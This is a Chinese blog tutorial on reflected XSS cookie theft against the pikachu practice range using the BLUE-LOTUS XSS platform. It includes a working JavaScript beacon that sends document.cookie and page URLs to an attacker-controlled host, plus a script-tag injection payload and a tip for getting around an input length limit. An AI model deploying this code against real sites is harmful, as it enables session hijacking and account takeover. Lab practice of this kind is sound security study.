XSS平台获取cookie

本文介绍了在HTTPS协议下,如何通过XSS平台BLUE-LOTUS和靶场pikachu进行反射型XSS攻击,以获取用户Cookie信息。作者详细阐述了创建XSS脚本、修改输入长度限制并注入payload的过程,以及解决模板协议不匹配问题的方法。在执行后,成功从XSS接收面板捕获到cookie信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS平台获取cookie

1.环境介绍

  • 靶场:pikachu
  • XSS平台:BLUE-LOTUS
  • 浏览器:谷歌浏览器

2.流程介绍

登录XSS平台,创建获取cookie的脚本

var website = "http://网站地址";
(function() {
    (new Image()).src = website + '/?keepsession=1&location=' + escape((function() {
        try {
            return document.location.href
        } catch (e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function() {
        try {
            return top.location.href
        } catch (e) {
            return ''
        }
    })()) + '&cookie=' + escape((function() {
        try {
            return document.cookie
        } catch (e) {
            return ''
        }
    })()) + '&opener=' + escape((function() {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
        } catch (e) {
            return ''
        }
    })());
})();

在这里插入图片描述

登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)

在这里插入图片描述

由于输入框在前端进行了长度限制,可以选择检查进行修改

在这里插入图片描述

然后再输入框内输入payload

<script src="https:///网站地址/myjs/cookie.js"></script>

执行后就可以在XSS接收面板获取到用户的cookie信息了

在这里插入图片描述

3.遇到的问题

由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值